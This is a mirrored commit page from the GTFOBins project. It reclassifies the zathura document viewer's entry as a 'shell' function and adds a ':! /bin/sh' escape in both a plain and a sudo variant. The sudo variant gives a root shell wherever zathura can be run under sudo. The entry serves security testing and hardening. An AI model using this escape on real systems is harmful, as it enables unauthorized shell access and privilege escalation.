1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-07 20:50:38 +02:00

Promote zathura command to shell

Related to #293.
This commit is contained in:
Andrea Cardaci 2022-06-08 13:41:12 +02:00
parent 4c7de76975
commit 3cdfea5714

View File

@ -1,11 +1,12 @@
---
description: The interaction happens in a GUI window, while the shell is dropped in the terminal.
functions:
command:
shell:
- code: |
zathura
:! id
:! /bin/sh -c 'exec /bin/sh 0<&1'
sudo:
- code: |
sudo zathura
:! id
:! /bin/sh -c 'exec /bin/sh 0<&1'
---